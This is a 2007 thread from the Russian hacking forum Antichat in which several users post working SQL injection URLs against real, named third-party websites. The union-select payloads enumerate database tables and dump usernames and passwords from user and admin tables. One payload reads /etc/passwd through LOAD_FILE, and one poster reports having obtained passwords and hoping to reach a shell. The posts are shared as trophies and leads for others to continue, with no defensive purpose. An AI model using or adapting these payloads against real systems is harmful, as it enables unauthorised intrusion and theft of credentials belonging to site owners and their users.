ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #2861  
Старый 15.08.2007, 23:39
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

Цитата:
http://www.chita.ru/firms/index.php?page=view&id=-9302+union+select+1,2,3,4,5,table_name,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24+from+infor mation_schema.tables+WHERE+TABLE_NAME+NOT+IN+(CHAR (67,72,65,82,65,67,84,69,82,95,83,69,84,83))/*
Вот решил запостить, мне понравилось тут раскапывать. Интересно работать с пятой версией мускула но...
Таблицы найдены, пароли получены, вот только куда их подставлять я не нашел - может кто докопает. Я эту скулю у себя хранил долго, покуда не разузнал про пятую версию мускула, а потом ковырялся в старых залежах набрал version() и о чудо 5.ХХ.ХХ, а это значит можно узнать все таблицы и т.д.!!!!!
Вот кстати и таблички
Цитата:
CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
auth_user id, site_id, username, password, permis, userlevel - это столбики
forget_psw
images
inetcat_anti_cheat
proxys
sessions
sites
user_tables
user_tables_fields
user_tables_params
ut_afisha
ut_brd
ut_brd_users
ut_citys
ut_firm_offers
ut_firms
ut_inetcat
ut_money
ut_news
ut_news_nlist
ut_offer_types
ut_sources
ut_tv
ut_tv_descrs
ut_tv_genres
Жаль до шелла не дошло.... может кто???..., а нет так и ладно
 
Ответить с цитированием

  #2862  
Старый 16.08.2007, 02:02
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Код:
http://hells.timeserv.biz/cms/page_view.php?id=110+union+select+1,2,password,admin+from+settings/*
version 4.1.21-standard

Последний раз редактировалось Nazaret2005; 16.08.2007 в 02:04..
 
Ответить с цитированием

  #2863  
Старый 16.08.2007, 14:26
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Код:
_http://www.hudaweb.com/movlit//autor.php?autor=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/*
Зы со скриптом подбор колонок стал намного быстрее...
P.S. Скрипт можно взять тут: https://forum.antichat.ru/thread46849.html
Удачных скулей!
 
Ответить с цитированием

  #2864  
Старый 16.08.2007, 14:42
Аватар для -=lebed=-
-=lebed=-
Флудер
Регистрация: 21.06.2006
Сообщений: 3,193
Провел на форуме:
12702287

Репутация: 4738


По умолчанию

Код:
_http://www.elforat.net/autor.php?id=-1+union+select+1,2,3,4,5/*
Код:
http://www.bajazzoverlag.ch/autor.php?id=-1+union+select+1,2,3,4,5,6,7/*
Код:
_http://www.3darena.de/autor/php/autor.php?autor_id=-1+union+select+concat(user(),version())/*

Последний раз редактировалось -=lebed=-; 16.08.2007 в 15:03..
 
Ответить с цитированием

  #2865  
Старый 16.08.2007, 19:42
Аватар для geezer.code
geezer.code
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489

Репутация: 1359


По умолчанию

вэб-дизайн Студия 5d.ru
Код:
http://www.iq-design.ru/content.php?act=tehnolog&div=-6+union+select+1,version(),3,4+from+news/*
Код:
http://www.nikas-s.ru/gallery.php?tab=photo&dir=-3+union+select+1,2,3,version(),5,6/*
Код:
http://www.interstahl.ru/?act=news&id=-2+union+select+1,2,3,4,5,user()
Код:
http://www.countrytravel.ru/second.php?act=main&div=-2+union+select+1,2,version(),4,5/*
Код:
http://www.razvod.ru/man.php?id=-651+union+select+1,2,3,concat_ws(0x3a,name,version()),5,6,7,8,9+from+authors/*
Код:
http://www.albitec.ru/content.php?cat=news&id=-25+union+select+1,2,3,4,5,6,7,8/*
Код:
http://www.interfax-religion.ru/?act=dujour&div=-275+union+select+1,version(),3,4,5,6,7,8,9,10/*
Код:
http://www.hifitech.ru/?act=product&id=-2632+union+select+1/*
Код:
http://www.kiyama.ru/content.php?act=mnu&browse=node&id=-64+union+select+1,2,3,4,5,6,7,8/*
Код:
http://www.bladeserver.ru/?act=news&id=-7+union+select+1,2,3,4,char(60,98,114,62,60,98,62,65,52,97,116,45,114,117,108,101,122,122,122,122,60,47,98,62),6,7,8,9/*

ребята очень упорно плодят уязвимые сайты
 
Ответить с цитированием

  #2866  
Старый 16.08.2007, 19:46
Аватар для t00th
t00th
Banned
Регистрация: 15.07.2007
Сообщений: 39
Провел на форуме:
1122110

Репутация: 43
По умолчанию

Моя первая SQL Инъекция :\
Код:
http://www.rapha.cc/index.php?page=-1+union+select+1,2,LOAD_FILE('/etc/passwd'),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*
 
Ответить с цитированием

  #2867  
Старый 17.08.2007, 00:57
Аватар для Nazaret2005
Nazaret2005
Новичок
Регистрация: 11.08.2007
Сообщений: 25
Провел на форуме:
131466

Репутация: 11
По умолчанию

Sharelita !
Цитата:
http://www.sharelita.com/newsfile.php?fileid=-10+union+select+id,2,3,4,concat(name,char(58),pass word),6,7,8,9,10,email+from+users+where+id=2+limit +0,1/*
 
Ответить с цитированием

  #2868  
Старый 17.08.2007, 03:05
Аватар для DRoT1K
DRoT1K
Новичок
Регистрация: 16.08.2007
Сообщений: 5
Провел на форуме:
20992

Репутация: 4
По умолчанию

Код:
http://www.anewpark.ca/parkupdate.php?id=-1+union+select+1,2,3,4,5/*
http://www.nonom.cn/showmz.php?id=-1+union+select+1,2,3,4,5,6,7,8/*
 
Ответить с цитированием

  #2869  
Старый 17.08.2007, 10:15
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

http://wow.crpg.ru/article.php?sid=-1+union+select+database(),2,version(),4,5,6,7,user (),9,10,11,12/*
дальше не пошло =(
 
Ответить с цитированием

  #2870  
Старый 17.08.2007, 11:00
Аватар для Red_Red1
Red_Red1
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
Провел на форуме:
4608122

Репутация: 874
Отправить сообщение для Red_Red1 с помощью ICQ
По умолчанию

По моему тут надо таким способом, а иначе фильтрация работает...
http://wow.crpg.ru/article.php?sid=-1+union+select+1,2,3,AES_DECRYPT(AES_ENCRYPT(versi on(),0x71),0x71),5,6,7,8,9,10,11,12/*
З.Ы. Но дальше тоже не пошло
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ